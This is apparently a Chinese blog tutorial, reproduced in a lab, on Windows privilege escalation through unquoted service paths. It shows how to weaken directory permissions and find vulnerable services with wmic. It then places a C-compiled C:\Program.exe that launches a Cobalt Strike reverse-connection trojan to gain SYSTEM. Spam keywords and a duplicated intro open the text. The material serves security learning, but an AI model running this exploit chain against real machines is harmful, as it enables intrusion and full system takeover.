阿里巴巴可以做公司网站吗,做网站的回扣,房地产销售,云虚拟主机做视频网站关注这个专栏的其他相关笔记#xff1a;[内网安全] 内网渗透 - 学习手册-CSDN博客 0x01#xff1a;Trusted Service Paths 提权原理
Windows 的服务通常都是以 System 权限运行的#xff0c;所以系统在解析服务的可执行文件路径中的空格的时候也会以 System 权限进行解析[内网安全] 内网渗透 - 学习手册-CSDN博客 0x01Trusted Service Paths 提权原理
Windows 的服务通常都是以 System 权限运行的所以系统在解析服务的可执行文件路径中的空格的时候也会以 System 权限进行解析如果我们能够利用这一特性就有机会提升权限。
如果在注册表中存在没有被引号包裹的服务路径且该服务路径中存在空格比如下面这样的服务路径就很可能造成攻击者的提权 C:\Program Files\Service Folder\testService.exe
针对上面这种服务路径由于空格的截断以及 Windows 自身的系统特性导致其实际解析流程如下 C:\Program.exeC:\Program Files\Service.exeC:\Program Files\Service Folder\testService.exe
系统以空格作为分割符首先找 C:\Program.exe 尝试运行如果不存在该程序则去启动 C:\Program Files\Service.exe 去尝试运行若依旧不存在该程序则再尝试去执行 C:\Program Files\Service Folder\testService.exe。注意了此时都是以 SYSTEM 权限进行执行的。
所以我们只要在相应的目录下制作一个恶意的程序让系统重启时以 SYSTEM 权限执行即可。所以使用 Trusted Service Paths 进行提权的条件如下 服务中存在没有被引号包裹的路径且该路径中包含空格。 当前用户具有到对应目录下写文件的权限。 服务被系统高权限用户启动。
0x02Trusted Service Paths 提权环境配置 复现环境 靶机 Windows 7IP 192.168.0.124 攻击机 Kali LinuxIP 192.168.0.100安装了 Cobalt Strike 服务端 攻击机 Windows 11IP 192.168.0.1安装了 Cobalt Strike 客户端还配备了 C 环境 0x0201创建不安全的服务
首先以 Administrator 系统最高管理员的身份登录 Windows 7该用户需要手动启动可以前参考前面的 操作系统权限介绍 中的内容在 C:\Program Files 文件夹下创建一个 Service Folder 文件夹假设这个文件夹就是管理员用来存放自己配置的服务的 然后在其中手动创建一个 testService.exe 文件这个文件啥内容都没有假设这个就是管理员配置的系统服务程序 然后调出 CMD 命令行使用下面的命令将这个程序添加进系统服务配置中并将启动项方式设置为 Auto以确保系统重启时会自动运行该程序 sc create testService binpath C:\Program Files\Service Folder\testService.exe start auto# testService 你注册的服务的名称# binpath 你注册服务的程序路径# start 注册服务的启动方式auto 为开机自启 0x0202查询系统服务启动方式和权限
1. 通过 CMD 命令行查询
在 CMD 命令行窗口中输入如下命令查询 testService 启动方式和执行权限 sc qc testService 2. 通过 Windows 服务功能查看
按住 Win R 打开 “运行” 对话框往里头填入 “services.msc” 命令即可调用 Windows 服务功能 然后在该功能中我们可以很轻松的就定位到我们刚刚创建的 testService 服务 如上testService 服务的可执行文件路径没有被引号包裹且路径中存在空格非常符合我们漏洞复现的要求。
如果你仔细在这里面翻找服务可以看到大部分的服务可执行文件路径似乎都没有加引号然后为了给读者涨涨见识下面贴出一张路径加了引号的服务图片像这种服务就是无法利用的 0x0203为用户配置对应目录写入权限
1. 查看对应目录用户权限
在前面的配置中我们创建了一个不安全的系统服务对应的程序路径是 C:\Program Files\Service Folder\testService.exe
针对该路径为了让后续渗透方利用的舒心我们还要给低权限用户配置一个对应路径的写权限针对上面这个文件我们需要配置的低权限用户具有写入权限的路径有选一个即可 C:\C:\Program Files\C:\Program Files\Service Folder\ # 如果对该目录有读写修改权限我们可以直接重写服务内容
我们先来查看一下上面这两个目录的默认配置由于是 C 盘所以默认权限都限制的比较严格 icacls C:\\ # 查询 C:\ 目录下的权限icacls C:\\Program Files # 查询 C:\Program Files 目录下的权限icacls C:\\Program Files\\Service Folder 如上可以看到针对 C:\ 目录Users 用户组的普通用户只有 RX 读取和执行权限没有写入权限所以为了后续的漏洞利用我们还需要赋予普通用户目录写入的权限。同时我们还注意到该目录的完整性级别为 High Mandatory Level证明只有管理员级别的用户可以访问该目录我们的普通用户是无法操作此目录的所以我们后续还需要降低目录的完整性级别。 icacls 标识对应的权限 W写权限R 读权限X 执行权限F 完全访问权限M 修改权限。 2. 赋予用户对应目录写入权限
下面我们针对 C:\ 目录赋予低权限用户写入权限。
2.1 赋予用户对应目录写入权限 — 命令行方式
输入下面的命令赋予系统内置的 Users 用户组对应目录C:\的写入权限 icacls C:\\ /grant BUILTIN\Users:(w) # 授予用户组对应目录写权限 如上系统内置的 Users 用户组已经成功获得了对应目录的写权限。但是其实此时 Users 用户组中的用户还是无法在 C:\ 目录下创建文件的因为被 C:\ 的目录完整性级别限制了所以我们还得降低 C:\ 目录的完整性级别让 Users 用户组得以写文件到目标路径。
3. 可选降低目录/文件完整性级别
我们上面通过 icacls 工具设置的是目录的 NTFS 权限NTFSNew Technology File System是 Windows 操作系统中常用的文件系统它支持对文件和目录设置详细的权限控制。
但是我们这边讲解的 ”完整性级别“ 是独立于 NTFS 权限的一种安全机制。即使 NTFS 权限允许访问了如果完整性级别不匹配访问仍然会被拒绝。 所以这里我们就需要降低C:\ 目录的完整性级别以允许低级别用户进行操作。
3.1 目录/文件完整性级别介绍
完整性级别是 Windows 中用于控制资源访问的安全机制通常与用户账户控制UAC相关。
Windows 中的完整性级别分为以下几种 LowL最低级别通常用于浏览器等低权限进程。 MediumM默认级别普通用户进程运行在此级别。 HighH管理员权限进程运行在此级别。 SystemS系统内核和核心服务运行在此级别。
Windows 完整性级别的使用场景可以分为以下几个方面
3.1.1 降低权限将完整性设置为 LowL 场景 适用于需要严格限制访问权限的目录或文件。 通常用于隔离低信任度的应用程序或数据如浏览器缓存、临时文件等。 作用 只有运行在 LowL完整性级别的进程如浏览器沙盒可以访问这些资源。 运行在 MediumM或更高完整性级别的进程如普通用户程序无法访问。 示例 将浏览器下载目录的完整性级别设置为 Low以防止恶意软件通过下载的文件影响系统。
icacls C:\Downloads /setintegritylevel L
3.1.2 恢复默认将完整性级别设置为 MediumM 场景 适用于普通用户目录或文件恢复默认的访问权限。 当目录或文件的完整性级别被错误地设置为 Low 或 High 时可以使用此操作恢复默认。 作用 运行运行在 MediumM或更高完整性级别的进程访问。 这是大多数用户程序和文件的默认级别。 示例 将某个目录恢复为默认的完整性级别
icacls C:\ExampleFolder /setintegritylevel M
3.1.3 提高权限将完整性级别设置为 HighH 场景 适用于需要高安全性的目录或文件。 通常用于保护系统关键文件或管理员专用文件。 作用 只有运行在 HighH或 SystemS完整性级别的进程如管理员程序可以访问。 运行在 MediumM或更低完整性级别的进程如普通用户程序无法访问。 示例 将某个包含敏感数据的目录设置为 High以限制只有管理员可以访问
icacls C:\SensitiveData /setintegritylevel H
3.2 降低 C:\ 目录完整性级别
输入下面的命令修改 C:\ 目录完整性为 Medium以允许普通用户对该目录有操作权限
icacls C:\\ /setintegritylevel M 4. 提权环境检查
我们切换到 Windows 系统中的一个标准用户笔者这里选择的是 test01 用户 然后跑到 C:\ 下看看我们可不可以新建文本文件如果可以证明你的环境就 OK 了 0x03Trusted Service Paths 提权漏洞复现
0x0301拿到靶机低权限用户 Shell
既然是提权我们肯定得先拿到靶机的一个低权限用户此处我们就以上面的一般用户 test01 为例来演示如何提权到 SYSTEM。
在 Kali 上开启 CS 服务端并在 Windows 11 辅助机上使用 CS 客户端进行连接 我们在 CS 中创建一个监听器监听 CS 服务端的 4444 端口。然后使用该监听器创建一个 Windows 后门程序 artifact.exe并上传到 Windows 7 靶机中 双击 artifact.exe 文件获取靶机的低权限 Shell 下面我们就要开始使用 Trusted Service Paths 进行提权了。
0x0302定位不安全的服务
在 CS 中输入下面的命令定位靶机中没有配置引号且带有空格路径的服务
wmic service get name,displayname,pathname,startmode | findstr /i Auto | findstr /i /v C:\\Windows\\ | findstr /i /v 如上成功发现有一个服务十分符合我们的要求整理一下显示如下
name : testService
displayname : testService
pathname : C:\Program Files\Service Folder\testService.exe
startmode : Auto
0x0303检查特定目录是否具有写权限
针对上面获得的那个服务我们可以利用的提权路径有以下几条
C:\
C:\Program Files\
C:\Program Files\Service Folder\
我们先来查看以下我们当前用户所属的组
whoami /groups 如上我们当前用户属于本地的 Users 用户组具有 Medium 的完整性级别。知道了这些信息接下里我们来一个一个查看目录权限看我们对其是否具有写入权限
icacls C:\\ 如上C:\ 是一个可被利用的目录。
0x0304制作服务劫持程序
在前面的信息收集中我们发现目标靶机上存在一个可被利用的服务其服务程序路径为
C:\Program Files\Service Folder\testService.exe
又通过信息收集发现了当前用户对 C:\ 具有写权限。所以接下来我们将要在目标的 C:\ 目录下创建一个 Program.exe 程序利用 Windows 服务执行特性进行提权。
这里我们采用 C 来制作恶意程序因为 C 程序编译后会直接生成一个 exe 文件采用其他编程语言的话你还得自己打包很麻烦下面是程序代码
#include stdio.h
#include stdlib.hint main() {system(cmd.exe /c C:\\Users\\test01\\Desktop\\artifact.exe);return 0;
}
这个程序的逻辑很简单运行后会通过 CMD 执行一遍我们用 CS 制作的 Windows 反弹连接的木马文件我们前面拿到靶机的低权限 Shell 就是用的这个文件。
将上面的程序编译后保存为 Program.exe并将该 EXE 文件上传到靶机的 C:\ 下 0x0305等待靶机重启 提权成功
当我们将上面这一切都准备好后接下来就是等待管理员重启计算机了。因为只有重启计算机了那些开机自启的服务才会自动执行只有服务被执行才会触发我们刚刚创建的劫持文件。
这里我们手动重启一下靶机一般低权限用户是无法重启电脑的。重启后靶机显示如下可能是笔者制作的木马的问题当然更可能是木马存放路径的问题 显示 C:\Program.exe 文件有问题其实已经证明了 Windows 服务的解析漏洞是存在的。等待一会即可看到 CS 上上线了目标靶机的 SYSTEM 用户证明我们提权成功
